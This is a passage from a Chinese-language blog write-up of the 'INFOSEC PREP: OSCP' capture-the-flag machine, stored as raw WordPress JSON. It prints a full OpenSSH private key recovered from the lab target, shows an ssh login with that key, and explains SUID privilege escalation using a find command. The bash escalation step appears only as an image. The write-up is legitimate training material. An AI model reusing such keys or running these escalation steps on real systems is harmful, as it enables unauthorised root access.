-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAtHCsSzHtUF8K8tiOqECQYLrKKrCRsbvq6iIG7R9g0WPv9w+gkUWe\nIzBScvglLE9flolsKdxfMQQbMVGqSADnYBTavaigQekue0bLsYk\/rZ5FhOURZLTvdlJWxz\nbIeyC5a5F0Dl9UYmzChe43z0Do0iQw178GJUQaqscLmEatqIiT\/2FkF+AveW3hqPfbrw9v\nA9QAIUA3ledqr8XEzY\/\/Lq0+sQg\/pUu0KPkY18i6vnfiYHGkyW1SgryPh5x9BGTk3eRYcN\nw6mDbAjXKKCHGM+dnnGNgvAkqT+gZWz\/Mpy0ekauk6NP7NCzORNrIXAYFa1rWzaEtypHwY\nkCEcfWJJlZ7+fcEFa5B7gEwt\/aKdFRXPQwinFliQMYMmau8PZbPiBIrxtIYXy3MHcKBIsJ\n0HSKv+HbKW9kpTL5OoAkB8fHF30ujVOb6YTuc1sJKWRHIZY3qe08I2RXeExFFYu9oLug0d\ntHYdJHFL7cWiNv4mRyJ9RcrhVL1V3CazNZKKwraRAAAFgH9JQL1\/SUC9AAAAB3NzaC1yc2\nEAAAGBALRwrEsx7VBfCvLYjqhAkGC6yiqwkbG76uoiBu0fYNFj7\/cPoJFFniMwUnL4JSxP\nX5aJbCncXzEEGzFRqkgA52AU2r2ooEHpLntGy7GJP62eRYTlEWS073ZSVsc2yHsguWuRdA\n5fVGJswoXuN89A6NIkMNe\/BiVEGqrHC5hGraiIk\/9hZBfgL3lt4aj3268PbwPUACFAN5Xn\naq\/FxM2P\/y6tPrEIP6VLtCj5GNfIur534mBxpMltUoK8j4ecfQRk5N3kWHDcOpg2wI1yig\nhxjPnZ5xjYLwJKk\/oGVs\/zKctHpGrpOjT+zQszkTayFwGBWta1s2hLcqR8GJAhHH1iSZWe\n\/n3BBWuQe4BMLf2inRUVz0MIpxZYkDGDJmrvD2Wz4gSK8bSGF8tzB3CgSLCdB0ir\/h2ylv\nZKUy+TqAJAfHxxd9Lo1Tm+mE7nNbCSlkRyGWN6ntPCNkV3hMRRWLvaC7oNHbR2HSRxS+3F\nojb+JkcifUXK4VS9VdwmszWSisK2kQAAAAMBAAEAAAGBALCyzeZtJApaqGwb6ceWQkyXXr\nbjZil47pkNbV70JWmnxixY31KjrDKldXgkzLJRoDfYp1Vu+sETVlW7tVcBm5MZmQO1iApD\ngUMzlvFqiDNLFKUJdTj7fqyOAXDgkv8QksNmExKoBAjGnM9u8rRAyj5PNo1wAWKpCLxIY3\nBhdlneNaAXDV\/cKGFvW1aOMlGCeaJ0DxSAwG5Jys4Ki6kJ5EkfWo8elsUWF30wQkW9yjIP\nUF5Fq6udJPnmEWApvLt62IeTvFqg+tPtGnVPleO3lvnCBBIxf8vBk8WtoJVJdJt3hO8c4j\nkMtXsvLgRlve1bZUZX5MymHalN\/LA1IsoC4Ykg\/pMg3s9cYRRkm+GxiUU5bv9ezwM4Bmko\nQPvyUcye28zwkO6tgVMZx4osrIoN9WtDUUdbdmD2UBZ2n3CZMkOV9XJxeju51kH1fs8q39\nQXfxdNhBb3Yr2RjCFULDxhwDSIHzG7gfJEDaWYcOkNkIaHHgaV7kxzypYcqLrs0S7C4QAA\nAMEAhdmD7Qu5trtBF3mgfcdqpZOq6+tW6hkmR0hZNX5Z6fnedUx\/\/QY5swKAEvgNCKK8Sm\niFXlYfgH6K\/5UnZngEbjMQMTdOOlkbrgpMYih+ZgyvK1LoOTyMvVgT5LMgjJGsaQ5393M2\nyUEiSXer7q90N6VHYXDJhUWX2V3QMcCqptSCS1bSqvkmNvhQXMAaAS8AJw19qXWXim15Sp\nWoqdjoSWEJxKeFTwUW7WOiYC2Fv5ds3cYOR8RorbmGnzdiZgxZAAAAwQDhNXKmS0oVMdDy\n3fKZgTuwr8My5Hyl5jra6owj\/5rJMUX6sjZEigZa96EjcevZJyGTF2uV77AQ2Rqwnbb2Gl\njdLkc0Yt9ubqSikd5f8AkZlZBsCIrvuDQZCoxZBGuD2DUWzOgKMlfxvFBNQF+LWFgtbrSP\nOgB4ihdPC1+6FdSjQJ77f1bNGHmn0amoiuJjlUOOPL1cIPzt0hzERLj2qv9DUelTOUranO\ncUWrPgrzVGT+QvkkjGJFX+r8tGWCAOQRUAAADBAM0cRhDowOFx50HkE+HMIJ2jQIefvwpm\nBn2FN6kw4GLZiVcqUT6aY68njLihtDpeeSzopSjyKh10bNwRS0DAILscWg6xc\/R8yueAeI\nRcw85udkhNVWperg4OsiFZMpwKqcMlt8i6lVmoUBjRtBD4g5MYWRANO0Nj9VWMTbW9RLiR\nkuoRiShh6uCjGCCH\/WfwCof9enCej4HEj5EPj8nZ0cMNvoARq7VnCNGTPamcXBrfIwxcVT\n8nfK2oDc6LfrDmjQAAAAlvc2NwQG9zY3A=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n\u76f4\u63a5ssh\u8fde\u63a5\u4e0a\u53bb\uff1a<\/p>\n
ssh -i id_rsa oscp@172.20.10.4\n# ssh\u670d\u52a1\u5f00\u4e86\u7684\n# id_rsa\u662f1.txt\u6539\u4e86\u4e2a\u540d\u5b57\uff1amv 1.txt id_rsa\n# \u7528\u6237\u540d\u662f\u7ed9\u4e86\u7684oscp\n\u250c\u2500\u2500(kali\u327fkali)-[~\/nmap\/OSCP]\n\u2514\u2500$ ssh -i id_rsa oscp@172.20.10.4\nThe authenticity of host '172.20.10.4 (172.20.10.4)' can't be established.\nED25519 key fingerprint is SHA256:OORLHLygIlTRZ4nXi9nq+WIrJ26fv7tfgvVHm8FaAzE.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '172.20.10.4' (ED25519) to the list of known hosts.\nWelcome to Ubuntu 20.04 LTS (GNU\/Linux 5.4.0-40-generic x86_64)\n * Documentation: https:\/\/help.ubuntu.com\n * Management: https:\/\/landscape.canonical.com\n * Support: https:\/\/ubuntu.com\/advantage\n System information as of Wed 24 Jan 2024 03:28:22 AM UTC\n System load: 0.08 Processes: 172\n Usage of \/: 26.8% of 19.56GB Users logged in: 0\n Memory usage: 58% IPv4 address for eth0: 172.20.10.4\n Swap usage: 0%\n0 updates can be installed immediately.\n0 of these updates are security updates.\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\nLast login: Sat Jul 11 16:50:11 2020 from 192.168.128.1<\/code><\/pre>\nSUID\u63d0\u6743<\/h2>\n\nSUID (Set UID)\u662fLinux\u4e2d\u7684\u4e00\u79cd\u7279\u6b8a\u6743\u9650,\u5176\u529f\u80fd\u4e3a\u7528\u6237\u8fd0\u884c\u67d0\u4e2a\u7a0b\u5e8f\u65f6\uff0c\u5982\u679c\u8be5\u7a0b\u5e8f\u6709SUID\u6743\u9650\uff0c\u90a3\u4e48\u7a0b\u5e8f\u8fd0\u884c\u4e3a\u8fdb\u7a0b\u65f6\uff0c\u8fdb\u7a0b\u7684\u5c5e\u4e3b\u4e0d\u662f\u53d1\u8d77\u8005\uff0c\u800c\u662f\u7a0b\u5e8f\u6587\u4ef6\u6240\u5c5e\u7684\u5c5e\u4e3b\u3002\u4f46\u662fSUID\u6743\u9650\u7684\u8bbe\u7f6e\u53ea\u9488\u5bf9\u4e8c\u8fdb\u5236\u53ef\u6267\u884c\u6587\u4ef6,\u5bf9\u4e8e\u975e\u53ef\u6267\u884c\u6587\u4ef6\u8bbe\u7f6eSUID\u6ca1\u6709\u4efb\u4f55\u610f\u4e49.<\/p>\n
\u5728\u6267\u884c\u8fc7\u7a0b\u4e2d\uff0c\u8c03\u7528\u8005\u4f1a\u6682\u65f6\u83b7\u5f97\u8be5\u6587\u4ef6\u7684\u6240\u6709\u8005\u6743\u9650,\u4e14\u8be5\u6743\u9650\u53ea\u5728\u7a0b\u5e8f\u6267\u884c\u7684\u8fc7\u7a0b\u4e2d\u6709\u6548. \u901a\u4fd7\u7684\u6765\u8bb2,\u5047\u8bbe\u6211\u4eec\u73b0\u5728\u6709\u4e00\u4e2a\u53ef\u6267\u884c\u6587\u4ef6ls<\/code>,\u5176\u5c5e\u4e3b\u4e3aroot,\u5f53\u6211\u4eec\u901a\u8fc7\u975eroot\u7528\u6237\u767b\u5f55\u65f6,\u5982\u679cls<\/code>\u8bbe\u7f6e\u4e86SUID\u6743\u9650,\u6211\u4eec\u53ef\u5728\u975eroot\u7528\u6237\u4e0b\u8fd0\u884c\u8be5\u4e8c\u8fdb\u5236\u53ef\u6267\u884c\u6587\u4ef6,\u5728\u6267\u884c\u6587\u4ef6\u65f6,\u8be5\u8fdb\u7a0b\u7684\u6743\u9650\u5c06\u4e3aroot\u6743\u9650.<\/p>\n<\/blockquote>\n\u5148\u4f7f\u7528find\u547d\u4ee4\u67e5\u627eSUID\u6587\u4ef6\uff1a<\/p>\n
find \/ -perm -u=s -type f 2>\/dev\/null<\/code><\/pre>\n![\"image-20240124114110737\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n
\u4f7f\u7528bash\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n
<\/div><\/p>\n
\u83b7\u53d6flag\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
INFOSEC PREP: OSCP \u542c\u8bf4\u8fd9\u4e2a\u9776\u573a\u5bf9\u65b0\u624b\u6bd4\u8f83\u53cb\u597d\uff0c\u4eca\u5929\u6765\u8bd5\u8bd5\uff0c\u5403\u4e00\u5811\u957f\u4e00\u667a\uff0c\u8fd9\u6b21\u4f7f\u7528virtu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-312","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/312","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=312"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/312\/revisions"}],"predecessor-version":[{"id":313,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/312\/revisions\/313"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=312"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=312"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=312"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240124101139259\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401241209530.png\")
<\/div><\/p>\n![\"image-20240124101305989\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401241209531.png\")
<\/div><\/p>\n![\"172.20.10.4_\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401241209532.png\")
<\/div><\/p>\n![\"image-20240124101715360\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401241209533.png\")
<\/div> <\/p>\n![\"image-20240124104654031\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401241209534.png\")
<\/div><\/p>\n![\"image-20240124110548284\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401241209535.png\")
<\/div><\/p>\n![\"image-20240124110631361\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401241209536.png\")
<\/div><\/p>\n![\"image-20240124114110737\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401241209538.png\")
<\/div><\/p>\n![\"image-20240124115118466\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401241209539.png\")
<\/div><\/p>\n